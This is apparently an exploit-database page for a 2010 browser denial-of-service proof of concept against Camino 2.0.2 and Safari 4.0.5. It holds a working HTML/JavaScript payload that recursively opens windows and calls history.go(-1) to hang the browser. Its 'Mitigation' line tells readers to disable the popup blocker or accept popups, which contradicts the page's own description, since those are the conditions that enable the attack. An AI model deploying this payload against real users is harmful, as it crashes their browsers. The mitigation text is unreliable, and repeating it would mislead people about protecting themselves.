header-logo
Suggest Exploit
vendor:
Camino, Safari
by:
Dr_IDE
4,3
CVSS
MEDIUM
Denial of Service (DoS)
20
CWE
Product Name: Camino, Safari
Affected Version From: Camino 2.0.2, Safari 4.0.5
Affected Version To: Camino 2.0.2, Safari 4.0.5
Patch Exists: NO
Related CWE: N/A
CPE: //a:camino:camino:2.0.2, //a:apple:safari:4.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: OSX 10.6.3
2010

Dr_IDE – Camino 2.0.2 & Safari 4.0.5 DoS PoC

Dr_IDE discovered a Denial of Service (DoS) vulnerability in Camino 2.0.2 and Safari 4.0.5. The vulnerability is triggered when a user visits a malicious website containing a script that calls the history.go() function in an infinite loop. The impact of the vulnerability is reduced because the user must either have popup blocker off, or accept popups.

Mitigation:

Disable popup blocker or accept popups.
Source

Exploit-DB raw data:

<--
Camino 2.0.2 history.go() DoS
Found By:   Dr_IDE
Tested On:  Camino 2.0.2 on OSX 10.6.3
Notes:      Impact is reduced because user must either have popup blocker off, or accept popups.

Tested On:  Safari 4.0.5 on OSX 10.6.3
Notes:      Impact is reduced because user must either have popup blocker off, or accept popups.
-->

<html>
<title>Dr_IDE - Camino 2.0.2 & Safari 4.0.5 DoS PoC</title>
<script>
function test(){
window.onerror=new Function("history.go(-1)");
window.open('http://www.exploit-db.com');
test();
}

test();
</script>
</html>

Navigation

Suggest Exploit

Services By CQR